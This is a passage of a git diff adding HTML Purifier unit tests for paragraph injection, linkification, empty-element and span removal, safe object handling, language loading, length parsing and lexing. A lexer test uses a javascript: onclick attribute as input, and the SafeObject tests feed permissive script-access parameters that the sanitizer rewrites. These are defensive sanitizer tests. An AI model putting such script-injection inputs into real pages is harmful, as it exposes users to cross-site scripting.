+<p>Par2</p>' + ); + } + + function testParagraphUnclosedInlineElement() { + $this->assertResult( + '<b>Par1', + '<p><b>Par1</b></p>' + ); + } + + function testPreservePreTags() { + $this->assertResult( +'<pre>Par1 + +Par1</pre>' + ); + } + + function testIgnoreTrailingWhitespace() { + $this->assertResult( +'Par1 + + ', +'<p>Par1</p> + +' + ); + } + + function testDoNotParagraphBlockElements() { + $this->assertResult( +'Par1 + +<div>Par2</div> + +Par3', +'<p>Par1</p> + +<div>Par2</div> + +<p>Par3</p>' + ); + } + + function testParagraphTextAndInlineNodes() { + $this->assertResult( +'Par<b>1</b>', + '<p>Par<b>1</b></p>' + ); + } + + function testPreserveLeadingWhitespace() { + $this->assertResult( +' + +Par', +' + +<p>Par</p>' + ); + } + + function testPreserveSurroundingWhitespace() { + $this->assertResult( +' + +Par + +', +' + +<p>Par</p> + +' + ); + } + + function testParagraphInsideBlockNode() { + $this->assertResult( +'<div>Par1 + +Par2</div>', +'<div><p>Par1</p> + +<p>Par2</p></div>' + ); + } + + function testParagraphInlineNodeInsideBlockNode() { + $this->assertResult( +'<div><b>Par1</b> + +Par2</div>', +'<div><p><b>Par1</b></p> + +<p>Par2</p></div>' + ); + } + + function testNoParagraphWhenOnlyOneInsideBlockNode() { + $this->assertResult('<div>Par1</div>'); + } + + function testParagraphTwoInlineNodesInsideBlockNode() { + $this->assertResult( +'<div><b>Par1</b> + +<i>Par2</i></div>', +'<div><p><b>Par1</b></p> + +<p><i>Par2</i></p></div>' + ); + } + + function testPreserveInlineNodesInPreTag() { + $this->assertResult( +'<pre><b>Par1</b> + +<i>Par2</i></pre>' + ); + } + + function testSplitUpInternalsOfPTagInBlockNode() { + $this->assertResult( +'<div><p>Foo + +Bar</p></div>', +'<div><p>Foo</p> + +<p>Bar</p></div>' + ); + } + + function testSplitUpInlineNodesInPTagInBlockNode() { + $this->assertResult( +'<div><p><b>Foo</b> + +<i>Bar</i></p></div>', +'<div><p><b>Foo</b></p> + +<p><i>Bar</i></p></div>' + ); + } + + function testNoParagraphSingleInlineNodeInBlockNode() { + $this->assertResult( '<div><b>Foo</b></div>' ); + } + + function testParagraphInBlockquote() { + $this->assertResult( +'<blockquote>Par1 + +Par2</blockquote>', +'<blockquote><p>Par1</p> + +<p>Par2</p></blockquote>' + ); + } + + function testNoParagraphBetweenListItem() { + $this->assertResult( +'<ul><li>Foo</li> + +<li>Bar</li></ul>' + ); + } + + function testParagraphSingleElementWithSurroundingSpace() { + $this->assertResult( +'<div> + +Bar + +</div>', + '<div> + +<p>Bar</p> + +</div>' + ); + } + + function testIgnoreExtraSpaceWithLeadingInlineNode() { + $this->assertResult( +'<b>Par1</b>a + + + +Par2', +'<p><b>Par1</b>a</p> + +<p>Par2</p>' + ); + } + + function testAbsorbExtraEndingPTag() { + $this->assertResult( +'Par1 + +Par2</p>', +'<p>Par1</p> + +<p>Par2</p>' + ); + } + + function testAbsorbExtraEndingDivTag() { + $this->assertResult( +'Par1 + +Par2</div>', +'<p>Par1</p> + +<p>Par2</p>' + ); + } + + function testDoNotParagraphSingleSurroundingSpaceInBlockNode() { + $this->assertResult( +'<div> +Par1 +</div>' + ); + } + + function testBlockNodeTextDelimeterInBlockNode() { + $this->assertResult( +'<div>Par1 + +<div>Par2</div></div>', +'<div><p>Par1</p> + +<div>Par2</div></div>' + ); + } + + function testBlockNodeTextDelimeterWithoutDoublespaceInBlockNode() { + $this->assertResult( +'<div>Par1 +<div>Par2</div></div>' + ); + } + + function testBlockNodeTextDelimeterWithoutDoublespace() { + $this->assertResult( +'Par1 +<div>Par2</div>', +'<p>Par1 +</p> + +<div>Par2</div>' + ); + } + + function testTwoParagraphsOfTextAndInlineNode() { + $this->assertResult( +'Par1 + +<b>Par2</b>', +'<p>Par1</p> + +<p><b>Par2</b></p>' + ); + } + + function testLeadingInlineNodeParagraph() { + $this->assertResult( +'<img /> Foo', +'<p><img /> Foo</p>' + ); + } + + function testTrailingInlineNodeParagraph() { + $this->assertResult( +'<li>Foo <a>bar</a></li>' + ); + } + + function testTwoInlineNodeParagraph() { + $this->assertResult( +'<li><b>baz</b><a>bar</a></li>' + ); + } + + function testNoParagraphTrailingBlockNodeInBlockNode() { + $this->assertResult( +'<div><div>asdf</div><b>asdf</b></div>' + ); + } + + function testParagraphTrailingBlockNodeWithDoublespaceInBlockNode() { + $this->assertResult( +'<div><div>asdf</div> + +<b>asdf</b></div>', +'<div><div>asdf</div> + +<p><b>asdf</b></p></div>' + ); + } + + function testParagraphTwoInlineNodesAndWhitespaceNode() { + $this->assertResult( +'<b>One</b> <i>Two</i>', +'<p><b>One</b> <i>Two</i></p>' + ); + } + + function testNoParagraphWithInlineRootNode() { + $this->config->set('HTML.Parent', 'span'); + $this->assertResult( +'Par + +Par2' + ); + } + + function testInlineAndBlockTagInDivNoParagraph() { + $this->assertResult( + '<div><code>bar</code> mmm <pre>asdf</pre></div>' + ); + } + + function testInlineAndBlockTagInDivNeedingParagraph() { + $this->assertResult( +'<div><code>bar</code> mmm + +<pre>asdf</pre></div>', +'<div><p><code>bar</code> mmm</p> + +<pre>asdf</pre></div>' + ); + } + + function testTextInlineNodeTextThenDoubleNewlineNeedsParagraph() { + $this->assertResult( +'<div>asdf <code>bar</code> mmm + +<pre>asdf</pre></div>', +'<div><p>asdf <code>bar</code> mmm</p> + +<pre>asdf</pre></div>' + ); + } + + function testUpcomingTokenHasNewline() { + $this->assertResult( +'<div>Test<b>foo</b>bar<b>bing</b>bang + +boo</div>', +'<div><p>Test<b>foo</b>bar<b>bing</b>bang</p> + +<p>boo</p></div>' +); + } + + function testEmptyTokenAtEndOfDiv() { + $this->assertResult( +'<div><p>foo</p> +</div>', +'<div><p>foo</p> +</div>' +); + } + + function testEmptyDoubleLineTokenAtEndOfDiv() { + $this->assertResult( +'<div><p>foo</p> + +</div>', +'<div><p>foo</p> + +</div>' +); + } + + function testTextState11Root() { + $this->assertResult('<div></div> '); + } + + function testTextState11Element() { + $this->assertResult( +"<div><div></div> + +</div>"); + } + + function testTextStateLikeElementState111NoWhitespace() { + $this->assertResult('<div><p>P</p>Boo</div>', '<div><p>P</p>Boo</div>'); + } + + function testElementState111NoWhitespace() { + $this->assertResult('<div><p>P</p><b>Boo</b></div>', '<div><p>P</p><b>Boo</b></div>'); + } + + function testElementState133() { + $this->assertResult( +"<div><b>B</b><pre>Ba</pre> + +Bar</div>", +"<div><b>B</b><pre>Ba</pre> + +<p>Bar</p></div>" +); + } + + function testElementState22() { + $this->assertResult( + '<ul><li>foo</li></ul>' + ); + } + + function testElementState311() { + $this->assertResult( + '<p>Foo</p><b>Bar</b>', +'<p>Foo</p> + +<p><b>Bar</b></p>' + ); + } + + function testAutoClose() { + $this->assertResult( + '<p></p> +<hr />' + ); + } + + function testErrorNeeded() { + $this->config->set('HTML.Allowed', 'b'); + $this->expectError('Cannot enable AutoParagraph injector because p is not allowed'); + $this->assertResult('<b>foobar</b>'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Injector/DisplayLinkURITest.php b/lib/htmlpurifier/tests/HTMLPurifier/Injector/DisplayLinkURITest.php new file mode 100644 index 000000000..1629d9bd1 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Injector/DisplayLinkURITest.php @@ -0,0 +1,33 @@ +<?php + +class HTMLPurifier_Injector_DisplayLinkURITest extends HTMLPurifier_InjectorHarness +{ + + function setup() { + parent::setup(); + $this->config->set('AutoFormat.DisplayLinkURI', true); + } + + function testBasicLink() { + $this->assertResult( + '<a href="http://malware.example.com">Don\'t go here!</a>', + '<a>Don\'t go here!</a> (http://malware.example.com)' + ); + } + + function testEmptyLink() { + $this->assertResult( + '<a>Don\'t go here!</a>', + '<a>Don\'t go here!</a>' + ); + } + function testEmptyText() { + $this->assertResult( + '<a href="http://malware.example.com"></a>', + '<a></a> (http://malware.example.com)' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Injector/LinkifyTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Injector/LinkifyTest.php new file mode 100644 index 000000000..1a1542d53 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Injector/LinkifyTest.php @@ -0,0 +1,50 @@ +<?php + +class HTMLPurifier_Injector_LinkifyTest extends HTMLPurifier_InjectorHarness +{ + + function setup() { + parent::setup(); + $this->config->set('AutoFormat.Linkify', true); + } + + function testLinkifyURLInRootNode() { + $this->assertResult( + 'http://example.com', + '<a href="http://example.com">http://example.com</a>' + ); + } + + function testLinkifyURLInInlineNode() { + $this->assertResult( + '<b>http://example.com</b>', + '<b><a href="http://example.com">http://example.com</a></b>' + ); + } + + function testBasicUsageCase() { + $this->assertResult( + 'This URL http://example.com is what you need', + 'This URL <a href="http://example.com">http://example.com</a> is what you need' + ); + } + + function testIgnoreURLInATag() { + $this->assertResult( + '<a>http://example.com/</a>' + ); + } + + function testNeeded() { + $this->config->set('HTML.Allowed', 'b'); + $this->expectError('Cannot enable Linkify injector because a is not allowed'); + $this->assertResult('http://example.com/'); + } + + function testExcludes() { + $this->assertResult('<a><span>http://example.com</span></a>'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Injector/PurifierLinkifyTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Injector/PurifierLinkifyTest.php new file mode 100644 index 000000000..774b234ad --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Injector/PurifierLinkifyTest.php @@ -0,0 +1,59 @@ +<?php + +class HTMLPurifier_Injector_PurifierLinkifyTest extends HTMLPurifier_InjectorHarness +{ + + function setup() { + parent::setup(); + $this->config->set('AutoFormat.PurifierLinkify', true); + $this->config->set('AutoFormat.PurifierLinkify.DocURL', '#%s'); + } + + function testNoTriggerCharacer() { + $this->assertResult('Foobar'); + } + + function testTriggerCharacterInIrrelevantContext() { + $this->assertResult('20% off!'); + } + + function testPreserveNamespace() { + $this->assertResult('%Core namespace (not recognized)'); + } + + function testLinkifyBasic() { + $this->assertResult( + '%Namespace.Directive', + '<a href="#Namespace.Directive">%Namespace.Directive</a>' + ); + } + + function testLinkifyWithAdjacentTextNodes() { + $this->assertResult( + 'This %Namespace.Directive thing', + 'This <a href="#Namespace.Directive">%Namespace.Directive</a> thing' + ); + } + + function testLinkifyInBlock() { + $this->assertResult( + '<div>This %Namespace.Directive thing</div>', + '<div>This <a href="#Namespace.Directive">%Namespace.Directive</a> thing</div>' + ); + } + + function testPreserveInATag() { + $this->assertResult( + '<a>%Namespace.Directive</a>' + ); + } + + function testNeeded() { + $this->config->set('HTML.Allowed', 'b'); + $this->expectError('Cannot enable PurifierLinkify injector because a is not allowed'); + $this->assertResult('%Namespace.Directive'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Injector/RemoveEmptyTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Injector/RemoveEmptyTest.php new file mode 100644 index 000000000..34dbc9515 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Injector/RemoveEmptyTest.php @@ -0,0 +1,80 @@ +<?php + +class HTMLPurifier_Injector_RemoveEmptyTest extends HTMLPurifier_InjectorHarness +{ + + public function setup() { + parent::setup(); + $this->config->set('AutoFormat.RemoveEmpty', true); + } + + function testPreserve() { + $this->assertResult('<b>asdf</b>'); + } + + function testRemove() { + $this->assertResult('<b></b>', ''); + } + + function testRemoveWithSpace() { + $this->assertResult('<b> </b>', ''); + } + + function testRemoveWithAttr() { + $this->assertResult('<b class="asdf"></b>', ''); + } + + function testRemoveIdAndName() { + $this->assertResult('<a id="asdf" name="asdf"></a>', ''); + } + + function testPreserveColgroup() { + $this->assertResult('<colgroup></colgroup>'); + } + + function testPreserveId() { + $this->config->set('Attr.EnableID', true); + $this->assertResult('<a id="asdf"></a>'); + } + + function testPreserveName() { + $this->config->set('Attr.EnableID', true); + $this->assertResult('<a name="asdf"></a>'); + } + + function testRemoveNested() { + $this->assertResult('<b><i></i></b>', ''); + } + + function testRemoveNested2() { + $this->assertResult('<b><i><u></u></i></b>', ''); + } + + function testRemoveNested3() { + $this->assertResult('<b> <i> <u> </u> </i> </b>', ''); + } + + function testRemoveNbsp() { + $this->config->set('AutoFormat.RemoveEmpty.RemoveNbsp', true); + $this->assertResult('<b> </b>', ''); + } + + function testRemoveNbspMix() { + $this->config->set('AutoFormat.RemoveEmpty.RemoveNbsp', true); + $this->assertResult('<b> </b>', ''); + } + + function testDontRemoveNbsp() { + $this->config->set('AutoFormat.RemoveEmpty.RemoveNbsp', true); + $this->assertResult('<td> </b>', "<td>\xC2\xA0</td>"); + } + + function testRemoveNbspExceptionsSpecial() { + $this->config->set('AutoFormat.RemoveEmpty.RemoveNbsp', true); + $this->config->set('AutoFormat.RemoveEmpty.RemoveNbsp.Exceptions', 'b'); + $this->assertResult('<b> </b>', "<b>\xC2\xA0</b>"); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Injector/RemoveSpansWithoutAttributesTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Injector/RemoveSpansWithoutAttributesTest.php new file mode 100755 index 000000000..704c1cd7b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Injector/RemoveSpansWithoutAttributesTest.php @@ -0,0 +1,99 @@ +<?php + +class HTMLPurifier_Injector_RemoveSpansWithoutAttributesTest extends HTMLPurifier_InjectorHarness +{ + function setup() { + parent::setup(); + $this->config->set('HTML.Allowed', 'span[class],div,p,strong,em'); + $this->config->set('AutoFormat.RemoveSpansWithoutAttributes', true); + } + + function testSingleSpan() { + $this->assertResult( + '<span>foo</span>', + 'foo' + ); + } + + function testSingleSpanWithAttributes() { + $this->assertResult( + '<span class="bar">foo</span>', + '<span class="bar">foo</span>' + ); + } + + function testSingleNestedSpan() { + $this->assertResult( + '<p><span>foo</span></p>', + '<p>foo</p>' + ); + } + + function testSingleNestedSpanWithAttributes() { + $this->assertResult( + '<p><span class="bar">foo</span></p>', + '<p><span class="bar">foo</span></p>' + ); + } + + + function testSpanWithChildren() { + $this->assertResult( + '<span>foo <strong>bar</strong> <em>baz</em></span>', + 'foo <strong>bar</strong> <em>baz</em>' + ); + } + + function testSpanWithSiblings() { + $this->assertResult( + '<p>before <span>inside</span> <strong>after</strong></p>', + '<p>before inside <strong>after</strong></p>' + ); + } + + function testNestedSpanWithSiblingsAndChildren() { + $this->assertResult( + '<p>a <span>b <em>c</em> d</span> e</p>', + '<p>a b <em>c</em> d e</p>' + ); + } + + function testNestedSpansWithoutAttributes() { + $this->assertResult( + '<span>one<span>two<span>three</span></span></span>', + 'onetwothree' + ); + } + + function testDeeplyNestedSpan() { + $this->assertResult( + '<div><div><div><span class="a">a <span>b</span> c</span></div></div></div>', + '<div><div><div><span class="a">a b c</span></div></div></div>' + ); + } + + function testSpanWithInvalidAttributes() { + $this->assertResult( + '<p><span snorkel buzzer="emu">foo</span></p>', + '<p>foo</p>' + ); + } + + function testNestedAlternateSpans() { + $this->assertResult( +'<span>a <span class="x">b <span>c <span class="y">d <span>e <span class="z">f +</span></span></span></span></span></span>', +'a <span class="x">b c <span class="y">d e <span class="z">f +</span></span></span>' + ); + } + + function testSpanWithSomeInvalidAttributes() { + $this->assertResult( + '<p><span buzzer="emu" class="bar">foo</span></p>', + '<p><span class="bar">foo</span></p>' + ); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Injector/SafeObjectTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Injector/SafeObjectTest.php new file mode 100644 index 000000000..59e0493c3 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Injector/SafeObjectTest.php @@ -0,0 +1,88 @@ +<?php + +/** + * This test is kinda weird, because it doesn't test the full safe object + * functionality, just a small section of it. Or maybe it's actually the right + * way. + */ +class HTMLPurifier_Injector_SafeObjectTest extends HTMLPurifier_InjectorHarness +{ + + function setup() { + parent::setup(); + // there is no AutoFormat.SafeObject directive + $this->config->set('AutoFormat.Custom', array(new HTMLPurifier_Injector_SafeObject())); + $this->config->set('HTML.Trusted', true); + } + + function testPreserve() { + $this->assertResult( + '<b>asdf</b>' + ); + } + + function testRemoveStrayParam() { + $this->assertResult( + '<param />', + '' + ); + } + + function testEditObjectParam() { + $this->assertResult( + '<object></object>', + '<object><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /></object>' + ); + } + + function testIgnoreStrayParam() { + $this->assertResult( + '<object><param /></object>', + '<object><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /></object>' + ); + } + + function testIgnoreDuplicates() { + $this->assertResult( + '<object><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /></object>' + ); + } + + function testIgnoreBogusData() { + $this->assertResult( + '<object><param name="allowScriptAccess" value="always" /><param name="allowNetworking" value="always" /></object>', + '<object><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /></object>' + ); + } + + function testIgnoreInvalidData() { + $this->assertResult( + '<object><param name="foo" value="bar" /></object>', + '<object><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /></object>' + ); + } + + function testKeepValidData() { + $this->assertResult( + '<object><param name="movie" value="bar" /></object>', + '<object data="bar"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="bar" /></object>' + ); + } + + function testNested() { + $this->assertResult( + '<object><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><object></object></object>', + '<object><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><object><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /></object></object>' + ); + } + + function testNotActuallyNested() { + $this->assertResult( + '<object><p><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /></p></object>', + '<object><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><p></p></object>' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/InjectorHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/InjectorHarness.php new file mode 100644 index 000000000..e3815175a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/InjectorHarness.php @@ -0,0 +1,13 @@ +<?php + +class HTMLPurifier_InjectorHarness extends HTMLPurifier_StrategyHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_Strategy_MakeWellFormed(); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/LanguageFactoryTest.php b/lib/htmlpurifier/tests/HTMLPurifier/LanguageFactoryTest.php new file mode 100644 index 000000000..9fea24f42 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/LanguageFactoryTest.php @@ -0,0 +1,70 @@ +<?php + +class HTMLPurifier_LanguageFactoryTest extends HTMLPurifier_Harness +{ + + /** + * Protected reference of global factory we're testing. + */ + protected $factory; + + public function setUp() { + $this->factory = HTMLPurifier_LanguageFactory::instance(); + parent::setUp(); + } + + function test() { + + $this->config->set('Core.Language', 'en'); + $language = $this->factory->create($this->config, $this->context); + + $this->assertIsA($language, 'HTMLPurifier_Language'); + $this->assertIdentical($language->code, 'en'); + + // lazy loading test + $this->assertIdentical(count($language->messages), 0); + $language->load(); + $this->assertNotEqual(count($language->messages), 0); + + } + + function testFallback() { + + $this->config->set('Core.Language', 'en-x-test'); + $language = $this->factory->create($this->config, $this->context); + + $this->assertIsA($language, 'HTMLPurifier_Language_en_x_test'); + $this->assertIdentical($language->code, 'en-x-test'); + + $language->load(); + + // test overloaded message + $this->assertIdentical($language->getMessage('HTMLPurifier'), 'HTML Purifier X'); + + // test inherited message + $this->assertIdentical($language->getMessage('LanguageFactoryTest: Pizza'), 'Pizza'); + + } + + function testFallbackWithNoClass() { + $this->config->set('Core.Language', 'en-x-testmini'); + $language = $this->factory->create($this->config, $this->context); + $this->assertIsA($language, 'HTMLPurifier_Language'); + $this->assertIdentical($language->code, 'en-x-testmini'); + $language->load(); + $this->assertIdentical($language->getMessage('HTMLPurifier'), 'HTML Purifier XNone'); + $this->assertIdentical($language->getMessage('LanguageFactoryTest: Pizza'), 'Pizza'); + $this->assertIdentical($language->error, false); + } + + function testNoSuchLanguage() { + $this->config->set('Core.Language', 'en-x-testnone'); + $language = $this->factory->create($this->config, $this->context); + $this->assertIsA($language, 'HTMLPurifier_Language'); + $this->assertIdentical($language->code, 'en-x-testnone'); + $this->assertIdentical($language->error, true); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/LanguageTest.php b/lib/htmlpurifier/tests/HTMLPurifier/LanguageTest.php new file mode 100644 index 000000000..033b6aa71 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/LanguageTest.php @@ -0,0 +1,79 @@ +<?php + +/** + * @todo Fix usage of HTMLPurifier_Language->_loaded using something else + */ +class HTMLPurifier_LanguageTest extends HTMLPurifier_Harness +{ + + protected $lang; + + protected function generateEnLanguage() { + $factory = HTMLPurifier_LanguageFactory::instance(); + $config = HTMLPurifier_Config::create(array('Core.Language' => 'en')); + $context = new HTMLPurifier_Context(); + return $factory->create($config, $context); + } + + function test_getMessage() { + $config = HTMLPurifier_Config::createDefault(); + $context = new HTMLPurifier_Context(); + $lang = new HTMLPurifier_Language($config, $context); + $lang->_loaded = true; + $lang->messages['HTMLPurifier'] = 'HTML Purifier'; + $this->assertIdentical($lang->getMessage('HTMLPurifier'), 'HTML Purifier'); + $this->assertIdentical($lang->getMessage('LanguageTest: Totally non-existent key'), '[LanguageTest: Totally non-existent key]'); + } + + function test_formatMessage() { + $config = HTMLPurifier_Config::createDefault(); + $context = new HTMLPurifier_Context(); + $lang = new HTMLPurifier_Language($config, $context); + $lang->_loaded = true; + $lang->messages['LanguageTest: Error'] = 'Error is $1 on line $2'; + $this->assertIdentical($lang->formatMessage('LanguageTest: Error', array(1=>'fatal', 32)), 'Error is fatal on line 32'); + } + + function test_formatMessage_tokenParameter() { + $config = HTMLPurifier_Config::createDefault(); + $context = new HTMLPurifier_Context(); + $generator = new HTMLPurifier_Generator($config, $context); // replace with mock if this gets icky + $context->register('Generator', $generator); + $lang = new HTMLPurifier_Language($config, $context); + $lang->_loaded = true; + $lang->messages['LanguageTest: Element info'] = 'Element Token: $1.Name, $1.Serialized, $1.Compact, $1.Line'; + $lang->messages['LanguageTest: Data info'] = 'Data Token: $1.Data, $1.Serialized, $1.Compact, $1.Line'; + $this->assertIdentical($lang->formatMessage('LanguageTest: Element info', + array(1=>new HTMLPurifier_Token_Start('a', array('href'=>'http://example.com'), 18))), + 'Element Token: a, <a href="http://example.com">, <a>, 18'); + $this->assertIdentical($lang->formatMessage('LanguageTest: Data info', + array(1=>new HTMLPurifier_Token_Text('data>', 23))), + 'Data Token: data>, data>, data>, 23'); + } + + function test_listify() { + $lang = $this->generateEnLanguage(); + $this->assertEqual($lang->listify(array('Item')), 'Item'); + $this->assertEqual($lang->listify(array('Item', 'Item2')), 'Item and Item2'); + $this->assertEqual($lang->listify(array('Item', 'Item2', 'Item3')), 'Item, Item2 and Item3'); + } + + function test_formatMessage_arrayParameter() { + $lang = $this->generateEnLanguage(); + + $array = array('Item1', 'Item2', 'Item3'); + $this->assertIdentical( + $lang->formatMessage('LanguageTest: List', array(1=>$array)), + 'Item1, Item2 and Item3' + ); + + $array = array('Key1' => 'Value1', 'Key2' => 'Value2'); + $this->assertIdentical( + $lang->formatMessage('LanguageTest: Hash', array(1=>$array)), + 'Key1 and Key2; Value1 and Value2' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/LengthTest.php b/lib/htmlpurifier/tests/HTMLPurifier/LengthTest.php new file mode 100644 index 000000000..2968b6d33 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/LengthTest.php @@ -0,0 +1,73 @@ +<?php + +class HTMLPurifier_LengthTest extends HTMLPurifier_Harness +{ + + function testConstruct() { + $l = new HTMLPurifier_Length('23', 'in'); + $this->assertIdentical($l->getN(), '23'); + $this->assertIdentical($l->getUnit(), 'in'); + } + + function testMake() { + $l = HTMLPurifier_Length::make('+23.4in'); + $this->assertIdentical($l->getN(), '+23.4'); + $this->assertIdentical($l->getUnit(), 'in'); + } + + function testToString() { + $l = new HTMLPurifier_Length('23', 'in'); + $this->assertIdentical($l->toString(), '23in'); + } + + protected function assertValidate($string, $expect = true) { + if ($expect === true) $expect = $string; + $l = HTMLPurifier_Length::make($string); + $result = $l->isValid(); + if ($result === false) $this->assertIdentical($expect, false); + else $this->assertIdentical($l->toString(), $expect); + } + + function testValidate() { + $this->assertValidate('0'); + $this->assertValidate('+0', '0'); + $this->assertValidate('-0', '0'); + $this->assertValidate('0px'); + $this->assertValidate('4.5px'); + $this->assertValidate('-4.5px'); + $this->assertValidate('3ex'); + $this->assertValidate('3em'); + $this->assertValidate('3in'); + $this->assertValidate('3cm'); + $this->assertValidate('3mm'); + $this->assertValidate('3pt'); + $this->assertValidate('3pc'); + $this->assertValidate('3PX', '3px'); + $this->assertValidate('3', false); + $this->assertValidate('3miles', false); + } + + /** + * @param $s1 First string to compare + * @param $s2 Second string to compare + * @param $expect 0 for $s1 == $s2, 1 for $s1 > $s2 and -1 for $s1 < $s2 + */ + protected function assertComparison($s1, $s2, $expect = 0) { + $l1 = HTMLPurifier_Length::make($s1); + $l2 = HTMLPurifier_Length::make($s2); + $r1 = $l1->compareTo($l2); + $r2 = $l2->compareTo($l1); + $this->assertIdentical($r1 == 0 ? 0 : ($r1 > 0 ? 1 : -1), $expect); + $this->assertIdentical($r2 == 0 ? 0 : ($r2 > 0 ? 1 : -1), - $expect); + } + + function testCompareTo() { + $this->assertComparison('12in', '12in'); + $this->assertComparison('12in', '12mm', 1); + $this->assertComparison('1px', '1mm', -1); + $this->assertComparison(str_repeat('2', 38) . 'in', '100px', 1); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Lexer/DirectLexTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Lexer/DirectLexTest.php new file mode 100644 index 000000000..095b5c952 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Lexer/DirectLexTest.php @@ -0,0 +1,130 @@ +<?php + +class HTMLPurifier_Lexer_DirectLexTest extends HTMLPurifier_Harness +{ + + protected $DirectLex; + + function setUp() { + $this->DirectLex = new HTMLPurifier_Lexer_DirectLex(); + } + + // internals testing + function test_parseAttributeString() { + + $input[0] = 'href="about:blank" rel="nofollow"'; + $expect[0] = array('href'=>'about:blank', 'rel'=>'nofollow'); + + $input[1] = "href='about:blank'"; + $expect[1] = array('href'=>'about:blank'); + + // note that the single quotes aren't /really/ escaped + $input[2] = 'onclick="javascript:alert(\'asdf\');"'; + $expect[2] = array('onclick' => "javascript:alert('asdf');"); + + $input[3] = 'selected'; + $expect[3] = array('selected'=>'selected'); + + // [INVALID] + $input[4] = '="nokey"'; + $expect[4] = array(); + + // [SIMPLE] + $input[5] = 'color=blue'; + $expect[5] = array('color' => 'blue'); + + // [INVALID] + $input[6] = 'href="about:blank'; + $expect[6] = array('href' => 'about:blank'); + + // [INVALID] + $input[7] = '"='; + $expect[7] = array('"' => ''); + // we ought to get array() + + $input[8] = 'href ="about:blank"rel ="nofollow"'; + $expect[8] = array('href' => 'about:blank', 'rel' => 'nofollow'); + + $input[9] = 'two bool'; + $expect[9] = array('two' => 'two', 'bool' => 'bool'); + + $input[10] = 'name="input" selected'; + $expect[10] = array('name' => 'input', 'selected' => 'selected'); + + $input[11] = '=""'; + $expect[11] = array(); + + $input[12] = '="" =""'; + $expect[12] = array('"' => ''); // tough to say, just don't throw a loop + + $input[13] = 'href="'; + $expect[13] = array('href' => ''); + + $input[14] = 'href=" <'; + $expect[14] = array('href' => ' <'); + + $config = HTMLPurifier_Config::createDefault(); + $context = new HTMLPurifier_Context(); + $size = count($input); + for($i = 0; $i < $size; $i++) { + $result = $this->DirectLex->parseAttributeString($input[$i], $config, $context); + $this->assertIdentical($expect[$i], $result, 'Test ' . $i . ': %s'); + } + + } + + function testLineNumbers() { + + // . . . . . . . . . . + // 01234567890123 01234567890123 0123456789012345 0123456789012 012345 + $html = "<b>Line 1</b>\n<i>Line 2</i>\nStill Line 2<br\n/>Now Line 4\n\n<br />"; + + $expect = array( + // line 1 + 0 => new HTMLPurifier_Token_Start('b') + ,1 => new HTMLPurifier_Token_Text('Line 1') + ,2 => new HTMLPurifier_Token_End('b') + ,3 => new HTMLPurifier_Token_Text("\n") + // line 2 + ,4 => new HTMLPurifier_Token_Start('i') + ,5 => new HTMLPurifier_Token_Text('Line 2') + ,6 => new HTMLPurifier_Token_End('i') + ,7 => new HTMLPurifier_Token_Text("\nStill Line 2") + // line 3 + ,8 => new HTMLPurifier_Token_Empty('br') + // line 4 + ,9 => new HTMLPurifier_Token_Text("Now Line 4\n\n") + // line SIX + ,10 => new HTMLPurifier_Token_Empty('br') + ); + + $context = new HTMLPurifier_Context(); + $config = HTMLPurifier_Config::createDefault(); + $output = $this->DirectLex->tokenizeHTML($html, $config, $context); + + $this->assertIdentical($output, $expect); + + $context = new HTMLPurifier_Context(); + $config = HTMLPurifier_Config::create(array( + 'Core.MaintainLineNumbers' => true + )); + $expect[0]->position(1, 0); + $expect[1]->position(1, 3); + $expect[2]->position(1, 9); + $expect[3]->position(2, -1); + $expect[4]->position(2, 0); + $expect[5]->position(2, 3); + $expect[6]->position(2, 9); + $expect[7]->position(3, -1); + $expect[8]->position(3, 12); + 